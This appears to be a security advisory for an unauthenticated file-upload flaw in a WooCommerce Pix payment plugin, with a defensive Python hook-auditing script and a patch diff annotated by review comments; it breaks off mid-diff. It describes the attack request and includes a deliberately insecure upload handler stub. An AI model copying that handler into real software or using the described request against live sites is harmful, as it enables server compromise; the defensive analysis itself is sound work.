Atomic Edge analysis of CVE-2026-3891:
The vulnerability exists in the Pix for WooCommerce plugin’s C6 payment gateway module. The root cause is an unauthenticated file upload handler that lacks capability checks and proper file validation. The plugin registers the ‘lkn_pix_for_woocommerce_c6_save_settings’ AJAX action with both ‘wp_ajax_’ and ‘wp_ajax_nopriv_’ hooks in the LknPaymentPixForWoocommerce class (lines 180-181 in the diff). This allows unauthenticated users to access the file upload functionality. The vulnerable function processes multipart form data containing certificate files and saves them to the server’s filesystem without verifying the user’s permissions or validating file types.

The patch removes the ‘wp_ajax_nopriv_’ hook registrations for three AJAX actions: ‘lkn_pix_for_woocommerce_c6_save_settings’, ‘lkn_pix_for_woocommerce_generate_nonce’, and ‘pixforwoo_test_c6_pix_charge’. This restricts access to authenticated users only. The patch also removes the insecure ‘generate_nonce’ function from the admin class and changes certificate storage from file paths to encoded database content.

Attackers can exploit this by sending a POST request to /wp-admin/admin-ajax.php with action=’lkn_pix_for_woocommerce_c6_save_settings’ and multipart form data containing malicious files. Successful exploitation allows arbitrary file upload to the server, potentially leading to remote code execution if the uploaded file is placed in an executable directory and accessed via HTTP.
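
The hook exposure described above can be audited mechanically. The Python script below is an added example, not code from the plugin or from Atomic Edge: it lists AJAX actions registered with wp_ajax_nopriv_ and checks each handler body for a capability check, a nonce check and upload handling. The hook lines and generate_nonce() are copied from the diff; the save-settings handler body and the names ajax_hooks, function_body and audit are constructed for illustration.

```python
import re

# Three-argument loader form used in the diff:
#   $this->loader->add_action('wp_ajax_[nopriv_]<action>', <object>, '<method>');
HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>\w+)['\"]\s*,"
    r"\s*(?P<target>[^,]+?)\s*,\s*['\"](?P<method>\w+)['\"]"
)
CAPABILITY_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(check_ajax_referer|wp_verify_nonce)\s*\(")

# Registrations as they appear on the pre-patch side of the diff.
BEFORE = r"""
$this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
$this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
$this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
$this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
$this->loader->add_action('wp_ajax_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
$this->loader->add_action('wp_ajax_nopriv_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
"""

# The same block on the patched side of the diff.
AFTER = r"""
$this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
// SECURITY: Removed wp_ajax_nopriv_ hooks to prevent unauthenticated access
$this->loader->add_action('wp_ajax_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
// SECURITY: Removed wp_ajax_nopriv_pixforwoo_test_c6_pix_charge - test integration requires authentication
"""

HANDLERS = r"""
public function generate_nonce()
{
    if (empty($_REQUEST['action_name'])) {
        wp_send_json_error(['message' => 'Missing action_name parameter.'], 400);
    }
    $action = sanitize_text_field(wp_unslash($_REQUEST['action_name']));
    $nonce = wp_create_nonce($action);
    wp_send_json_success(['nonce' => $nonce, 'action' => $action]);
}
// Constructed stand-in: the real save-settings handler is not shown on the page.
public function lkn_pix_for_woocommerce_c6_save_settings()
{
    $upload = $_FILES['certificate'];
    move_uploaded_file($upload['tmp_name'], $target_dir . $upload['name']);
    wp_send_json_success();
}
"""


def strip_comments(php):
    """Drop /* */ blocks and // or # comment lines so commented-out hooks are ignored."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    return "\n".join(l for l in php.splitlines()
                     if not l.lstrip().startswith(("//", "#")))


def ajax_hooks(php):
    """Map each AJAX action to its callback and whether it is exposed logged-in / logged-out."""
    hooks = {}
    for m in HOOK_RE.finditer(strip_comments(php)):
        entry = hooks.setdefault(
            m["action"], {"priv": False, "nopriv": False, "method": m["method"]})
        entry["nopriv" if m["nopriv"] else "priv"] = True
    return hooks


def function_body(php, name):
    """Return the `{ ... }` body of `function name(` by brace matching.
    Naive on purpose: braces inside PHP strings are not handled."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", php)
    start = php.find("{", m.end()) if m else -1
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(php)):
        depth += {"{": 1, "}": -1}.get(php[i], 0)
        if depth == 0:
            return php[start:i + 1]
    return None


def audit(hook_src, handler_src=""):
    """One finding per action reachable without login, with the guards seen in its handler."""
    findings = []
    for action, hook in sorted(ajax_hooks(hook_src).items()):
        if not hook["nopriv"]:
            continue
        body = function_body(handler_src, hook["method"])
        findings.append({
            "action": action,
            "method": hook["method"],
            "handler_found": body is not None,
            "capability_check": bool(body and CAPABILITY_RE.search(body)),
            # A nonce is CSRF protection, not authorization; reported separately.
            "nonce_check": bool(body and NONCE_RE.search(body)),
            "touches_uploads": bool(body and "$_FILES" in body),
        })
    return findings


if __name__ == "__main__":
    for finding in audit(BEFORE, HANDLERS):
        print(finding)
    print("after patch:", audit(AFTER, HANDLERS))
```

Run against a plugin tree by concatenating its PHP files into the two arguments; any finding with touches_uploads set and capability_check unset deserves manual review first.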

CVE-2026-3891: Pix for WooCommerce <= 1.5.0 – Unauthenticated Arbitrary File Upload (payment-gateway-pix-for-woocommerce)
CVE-2026-3891
1.5.0
1.6.0
Analysis Overview
Differential between vulnerable and patched code
--- a/payment-gateway-pix-for-woocommerce/Admin/LknPaymentPixForWoocommerceAdmin.php
+++ b/payment-gateway-pix-for-woocommerce/Admin/LknPaymentPixForWoocommerceAdmin.php
@@ -158,16 +158,4 @@
);
}
}
-
- public function generate_nonce()
- {
- if (empty($_REQUEST['action_name'])) {
- wp_send_json_error(['message' => 'Missing action_name parameter.'], 400);
- }
-
- $action = sanitize_text_field(wp_unslash($_REQUEST['action_name']));
- $nonce = wp_create_nonce($action);
-
- wp_send_json_success(['nonce' => $nonce, 'action' => $action]);
- }
}
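Review bot: Nothing in this patch shows the caller of the lkn_pix_for_woocommerce_generate_nonce action being updated after generate_nonce() is deleted here. The removed method returned wp_create_nonce() for any caller-supplied action_name with no capability check, so removing it is correct, but confirm the admin script that requested it now receives its nonce from a page that already requires an admin capability (for example via wp_localize_script), otherwise the settings screen will break silently.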
--- a/payment-gateway-pix-for-woocommerce/Admin/partials/payment-pix-for-woocommerce-admin-display.php
+++ b/payment-gateway-pix-for-woocommerce/Admin/partials/payment-pix-for-woocommerce-admin-display.php
@@ -1,5 +1,7 @@
<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+
/**
* Provide a admin area view for the plugin
*
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerce.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerce.php
@@ -2,6 +2,8 @@
namespace LknPaymentPixForWoocommerceIncludes;
+if ( ! defined( 'ABSPATH' ) ) exit;
+
use LknPaymentPixForWoocommerceAdminLknPaymentPixForWoocommerceAdmin;
use LknPaymentPixForWoocommerceIncludesLknPaymentPixForWoocommercePix;
use LknPaymentPixForWoocommercePublicViewLknPaymentPixForWoocommercePublic;
@@ -94,9 +96,11 @@
public $LknPaymentPixForWoocommercePixC6Class;
public $LknPaymentPixForWoocommercePixC6EndpointClass;
public $LknPaymentPixForWoocommercePixCieloClass;
+ public $LknPaymentPixForWoocommercePixCieloEndpointClass;
public $LknPaymentPixForWoocommercePixRedeClass;
public $LknPaymentPixForWoocommerceHelper;
public $LknPaymentPixForWoocommercePixEndpointClass;
+ public $LknPaymentPixForWoocommercePixRedeEndpointClass;
public function define_hook()
{
@@ -107,9 +111,11 @@
$this->LknPaymentPixForWoocommercePixC6Class = new LknPaymentPixForWoocommercePixC6();
$this->LknPaymentPixForWoocommercePixC6EndpointClass = new LknPaymentPixForWoocommercePixC6Endpoint();
$this->LknPaymentPixForWoocommercePixCieloClass = new LknPaymentPixForWoocommercePixCielo();
+ $this->LknPaymentPixForWoocommercePixCieloEndpointClass = new LknPaymentPixForWoocommercePixCieloEndpoint();
$this->LknPaymentPixForWoocommerceHelper = new LknPaymentPixForWoocommerceHelper();
$this->LknPaymentPixForWoocommercePixEndpointClass = new LknPaymentPixForWoocommercePixEndpoint();
$this->LknPaymentPixForWoocommercePixRedeClass = new LknPaymentPixForWoocommercePixRede();
+ $this->LknPaymentPixForWoocommercePixRedeEndpointClass = new LknPaymentPixForWoocommercePixRedeEndpoint();
$this->define_admin_hooks();
$this->define_public_hooks();
}
@@ -178,11 +184,10 @@
$this->loader->add_action('woocommerce_update_options_payment_gateways_' . $this->LknPaymentPixForWoocommercePixC6Class->id, $this->LknPaymentPixForWoocommercePixC6Class, "process_admin_options");
$this->loader->add_action('woocommerce_order_details_after_order_table', $this->LknPaymentPixForWoocommercePixC6Class, "showPix");
$this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
- $this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
- $this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
- $this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
+ // SECURITY: Removed wp_ajax_nopriv_ hooks to prevent unauthenticated access
+ // SECURITY: Removed insecure generate_nonce functionality - each gateway generates its own nonces
$this->loader->add_action('wp_ajax_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
- $this->loader->add_action('wp_ajax_nopriv_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
+ // SECURITY: Removed wp_ajax_nopriv_pixforwoo_test_c6_pix_charge - test integration requires authentication
$this->loader->add_action('woocommerce_update_options_payment_gateways_' . $this->LknPaymentPixForWoocommercePixCieloClass->id, $this->LknPaymentPixForWoocommercePixCieloClass, "process_admin_options");
$this->loader->add_action('woocommerce_order_details_after_order_table', $this->LknPaymentPixForWoocommercePixCieloClass, "showPix");
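Review bot: Dropping the wp_ajax_nopriv_ registrations still leaves lkn_pix_for_woocommerce_c6_save_settings and pixforwoo_test_c6_pix_charge registered under wp_ajax_, which fires for every logged-in account, including ordinary WooCommerce customers, and this hunk shows no capability check. Confirm both handlers begin with current_user_can('manage_woocommerce') (or the capability the settings page requires) and check_ajax_referer() before touching the request. The // SECURITY comments describe code that no longer exists; a changelog entry is a better home for them.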
@@ -257,10 +262,19 @@
if (isset($this->LknPaymentPixForWoocommercePixPagHiperEndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixPagHiperEndpointClass, 'registerVerifyPixEndPoint');
}
+
+ if (isset($this->LknPaymentPixForWoocommercePixRedeEndpointClass)) {
+ $this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixRedeEndpointClass, 'register_verify_pix_endpoint');
+ }
+
if (isset($this->LknPaymentPixForWoocommercePixC6EndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixC6EndpointClass, 'registerVerifyPixEndPoint');
}
+ if (isset($this->LknPaymentPixForWoocommercePixCieloEndpointClass)) {
+ $this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixCieloEndpointClass, 'register_verify_pix_endpoint');
+ }
+
if (isset($this->LknPaymentPixForWoocommercePixEndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixEndpointClass, 'registerRoutes');
}
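Review bot: The two new rest_api_init registrations for the Rede and Cielo endpoint classes add REST routes in a release whose purpose is to close unauthenticated access, and the route definitions, including any permission_callback, are not part of the visible diff, so they need the same scrutiny as the AJAX hooks. The isset() guards are also always true, because both properties are assigned unconditionally in the earlier hunk, and register_verify_pix_endpoint departs from the registerVerifyPixEndPoint naming used by the neighbouring registrations.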
@@ -295,7 +309,7 @@
{
$schedules['lkn_five_minutes'] = array(
'interval' => 300, // 5 minutos em segundos
- 'display' => __('Every 5 Minutes', 'gateway-de-pagamento-pix-para-woocommerce')
+ 'display' => __('Every 5 Minutes', 'lkn-payment-pix-for-woocommerce')
);
return $schedules;
}
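Review bot: The new text domain 'lkn-payment-pix-for-woocommerce' does not match the plugin directory shown in the diff paths (payment-gateway-pix-for-woocommerce), here and in every later hunk that makes the same substitution. Check it against the plugin slug and the Text Domain header before shipping, and consider moving this rename into its own commit so the security changes are not buried under several hundred lines of string edits.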
@@ -339,7 +353,7 @@
$new_meta_links['setting'] = sprintf(
'<a href="%1$s">%2$s</a>',
admin_url('admin.php?page=wc-settings&tab=checkout'),
- __('Settings', 'gateway-de-pagamento-pix-para-woocommerce')
+ __('Settings', 'lkn-payment-pix-for-woocommerce')
);
return array_merge($plugin_meta, $new_meta_links);
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceI18n.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceI18n.php
@@ -39,7 +39,7 @@
// WordPress loads translations automatically since version 4.6.
// load_plugin_textdomain(
- // 'gateway-de-pagamento-pix-para-woocommerce',
+ // 'lkn-payment-pix-for-woocommerce',
// false,
// dirname(dirname(plugin_basename(__FILE__))) . '/languages/'
// );
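Review bot: The only changed line here sits inside a commented-out load_plugin_textdomain() call, so it has no effect. The comment above the block already says WordPress loads translations automatically; delete the dead call instead of keeping its text domain in sync.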
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceLoader.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceLoader.php
@@ -1,6 +1,8 @@
<?php
namespace LknPaymentPixForWoocommerceIncludes;
+if ( ! defined( 'ABSPATH' ) ) exit;
+
/**
* Register all actions and filters for the plugin
*
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePix.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePix.php
@@ -18,8 +18,8 @@
$this->id = 'lkn_pix_for_woocommerce';
$this->title = 'Pix QR Code';
$this->has_fields = true;
- $this->method_title = esc_attr__('Pay with the Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce');
- $this->method_description = esc_attr__('Enables and configures payments with Pix', 'gateway-de-pagamento-pix-para-woocommerce');
+ $this->method_title = esc_attr__('Pay with the Pix QR Code', 'lkn-payment-pix-for-woocommerce');
+ $this->method_description = esc_attr__('Enables and configures payments with Pix', 'lkn-payment-pix-for-woocommerce');
// Define os campos de configuração do método de pagamento
@@ -55,7 +55,7 @@
'pixKey' => $this->get_option('pix_key'),
'pixName' => $this->get_option('pix_name'),
'pixCity' => $this->get_option('pix_city'),
- 'copiedText' => __('Copied!', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'copiedText' => __('Copied!', 'lkn-payment-pix-for-woocommerce'),
));
wp_enqueue_style('lkn-woo-payment-pix-style', PAYMENT_PIX_FOR_WOOCOMMERCE_DIR_URL . 'Public/css/LknPaymentPixForWoocommercePaymentFields.css', array(), '1.0.0', 'all');
@@ -79,83 +79,83 @@
{
$this->form_fields = array(
'enabled' => array(
- 'title' => esc_attr__('Enable/Disable', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable/Disable', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => __('Enables payment with Pix', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => __('Enables payment with Pix', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no'
),
'title' => array(
- 'title' => esc_attr__('Title', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Title', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => __('This field controls the title which the user sees during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => __('Pay with the Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('This field controls the title which the user sees during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => __('Pay with the Pix QR Code', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
),
'title_general' => array(
- 'title' => esc_attr__('General settings', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('General settings', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'pix_key_type' => array(
- 'title' => esc_attr__('Key Type', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Key Type', 'lkn-payment-pix-for-woocommerce'),
'type' => 'select',
- 'description' => esc_attr__('Select the type of PIX key.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Select the type of PIX key.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'class' => 'wc-enhanced-select',
'options' => array(
- 'tel' => esc_attr__('Phone', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'cpf' => esc_attr__('CPF', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'cnpj' => esc_attr__('CNPJ', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'email' => esc_attr__('Email', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'randomKey' => esc_attr__('Random key', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'tel' => esc_attr__('Phone', 'lkn-payment-pix-for-woocommerce'),
+ 'cpf' => esc_attr__('CPF', 'lkn-payment-pix-for-woocommerce'),
+ 'cnpj' => esc_attr__('CNPJ', 'lkn-payment-pix-for-woocommerce'),
+ 'email' => esc_attr__('Email', 'lkn-payment-pix-for-woocommerce'),
+ 'randomKey' => esc_attr__('Random key', 'lkn-payment-pix-for-woocommerce'),
),
),
'pix_key' => array(
- 'title' => esc_attr__('Pix Key', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Pix Key', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter the PIX key to be used for donations.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the PIX key to be used for donations.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'pix_name' => array(
- 'title' => esc_attr__('Beneficiary Name', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Beneficiary Name', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => esc_attr__('Enter the name of the key beneficiary.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the name of the key beneficiary.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'pix_city' => array(
- 'title' => esc_attr__('Beneficiary City', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Beneficiary City', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => esc_attr__('Enter the city of the key beneficiary.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the city of the key beneficiary.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'hidde_paid_pix' => array(
- 'title' => esc_attr__('Hide Pix after payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Hide Pix after payment', 'lkn-payment-pix-for-woocommerce'),
+ 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
'desc_tip' => true,
- 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
),
'title_additional_resources' => array(
- 'title' => esc_attr__('Additional Resources', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Additional Resources', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'debug' => array(
- 'title' => esc_attr__('Debug', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Debug', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable debug logs.', 'gateway-de-pagamento-pix-para-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">'. __('See logs', 'gateway-de-pagamento-pix-para-woocommerce') .'</a>'),
+ 'label' => esc_attr__('Enable debug logs.', 'lkn-payment-pix-for-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">'. __('See logs', 'lkn-payment-pix-for-woocommerce') .'</a>'),
'default' => 'no',
),
'pix_qr_code' => array(
- 'title' => esc_attr__('QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('QR Code', 'lkn-payment-pix-for-woocommerce'),
'type' => 'hidden',
'id' => 'lknPaymentPixForWoocommercePixQRCode',
- 'description' => esc_attr__('The QR code will only be valid if the key has been registered with a financial institution (Bank).', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('The QR code will only be valid if the key has been registered with a financial institution (Bank).', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
)
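Review bot: In the 'pix_key' field, the description rewritten by this hunk still reads 'Enter the PIX key to be used for donations.', which does not fit a WooCommerce payment gateway. Since the line is being touched anyway, correct the wording in the same change so translators do not have to redo the string later.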
@@ -173,7 +173,7 @@
'pixKey' => $this->get_option('pix_key'),
'pixName' => $this->get_option('pix_name'),
'pixCity' => $this->get_option('pix_city'),
- 'downloadQRCodeText' => __('Download QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'downloadQRCodeText' => __('Download QR Code', 'lkn-payment-pix-for-woocommerce'),
));
}
}
@@ -212,7 +212,7 @@
try {
if ($this->get_option('pix_key') == '') {
- throw new Exception(__('PIX key is not configured. Please set the PIX key in the plugin settings.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ throw new Exception(__('PIX key is not configured. Please set the PIX key in the plugin settings.', 'lkn-payment-pix-for-woocommerce'));
}
} catch (Exception $e) {
$this->add_error($e->getMessage());
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixBlocks.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixBlocks.php
@@ -52,7 +52,7 @@
return [
'title' => $this->gateway->title,
- 'description' => __('Pay for your purchase with pix using Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('Pay for your purchase with pix using Pix QR Code', 'lkn-payment-pix-for-woocommerce'),
];
}
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixC6.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixC6.php
@@ -18,8 +18,8 @@
$this->id = 'lkn_pix_for_woocommerce_c6';
$this->title = 'Pix C6';
$this->has_fields = true;
- $this->method_title = esc_attr__('Pay with Pix C6', 'gateway-de-pagamento-pix-para-woocommerce');
- $this->method_description = esc_attr__('Enable automatic payment confirmation through a C6 account', 'gateway-de-pagamento-pix-para-woocommerce');
+ $this->method_title = esc_attr__('Pay with Pix C6', 'lkn-payment-pix-for-woocommerce');
+ $this->method_description = esc_attr__('Enable automatic payment confirmation through a C6 account', 'lkn-payment-pix-for-woocommerce');
$this->init_form_fields();
$this->init_settings();
@@ -59,7 +59,7 @@
) {
// Muda status para pending
$order->update_status('pending');
- $order->add_order_note(__('Order returned to pending and new Pix generated after expiration.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ $order->add_order_note(__('Order returned to pending and new Pix generated after expiration.', 'lkn-payment-pix-for-woocommerce'));
// Dados necessários para gerar novo Pix
$environment = isset($settings['environment']) ? $settings['environment'] : 'production';
@@ -70,19 +70,21 @@
$pix_key = isset($settings['pix_key']) ? $settings['pix_key'] : '';
$client_id = isset($settings['client_id']) ? $settings['client_id'] : '';
$client_secret = isset($settings['client_secret']) ? $settings['client_secret'] : '';
- $crt_path = !empty($settings['certificate_crt_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_crt_path'] : '';
- $key_path = !empty($settings['certificate_key_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_key_path'] : '';
+ // SECURITY: Certificados armazenados como dados codificados no banco de dados
+ $crt_content = !empty($settings['certificate_crt_content']) ? $settings['certificate_crt_content'] : '';
+ $key_content = !empty($settings['certificate_key_content']) ? $settings['certificate_key_content'] : '';
+
+ $crt_path = !empty($crt_content) ? $this->create_temp_certificate_file($crt_content, 'crt') : '';
+ $key_path = !empty($key_content) ? $this->create_temp_certificate_file($key_content, 'key') : '';
// Auth token
$auth_result = LknPaymentPixForWoocommercePixC6Endpoint::get_c6_auth_token(
- $crt_path,
- $key_path,
$client_id,
$client_secret,
$base_url
);
if (!empty($auth_result['error'])) {
- $order->add_order_note(__('Error generating new Pix: ', 'gateway-de-pagamento-pix-para-woocommerce') . $auth_result['error']);
+ $order->add_order_note(__('Error generating new Pix: ', 'lkn-payment-pix-for-woocommerce') . $auth_result['error']);
$order->save();
return;
}
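Review bot: create_temp_certificate_file() now writes the certificate and the private key to temporary files each time a Pix is regenerated, and this hunk shows neither cleanup nor the permissions those files get. Make sure the helper creates them owner-readable only, outside the web root, and that they are unlinked when the request finishes (a try/finally around the API calls). $crt_path and $key_path are also no longer passed to get_c6_auth_token(), so if nothing later in the method reads them the files are written for nothing. Finally, the added comment says the certificates are stored 'codificados' (encoded); encoding is not encryption, so the private key remains readable to anything that can read the gateway settings.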
@@ -112,7 +114,7 @@
);
if (!empty($pix_result['error'])) {
- $order->add_order_note(__('Error generating new Pix: ', 'gateway-de-pagamento-pix-para-woocommerce') . $pix_result['error']);
+ $order->add_order_note(__('Error generating new Pix: ', 'lkn-payment-pix-for-woocommerce') . $pix_result['error']);
$order->save();
return;
}
@@ -158,189 +160,189 @@
{
$this->form_fields = array(
'title_general' => array(
- 'title' => esc_attr__('General settings', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('General settings', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'enabled' => array(
- 'title' => esc_attr__('Enable/Disable', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable/Disable', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => __('Enables payment with Pix', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to allow customers to pay using Pix.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => __('Enables payment with Pix', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to allow customers to pay using Pix.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Enable Pix Payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Activate or deactivate Pix for your store.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Enable or disable Pix payment for your store.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Enable Pix Payment', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Activate or deactivate Pix for your store.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Enable or disable Pix payment for your store.', 'lkn-payment-pix-for-woocommerce'),
),
'title' => array(
- 'title' => esc_attr__('Title', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Title', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => __('This field controls the title which the user sees during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => __('Pay with Pix C6', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('This field controls the title which the user sees during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => __('Pay with Pix C6', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Checkout Title', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Displayed to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Set the title for Pix payment on checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Checkout Title', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Displayed to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
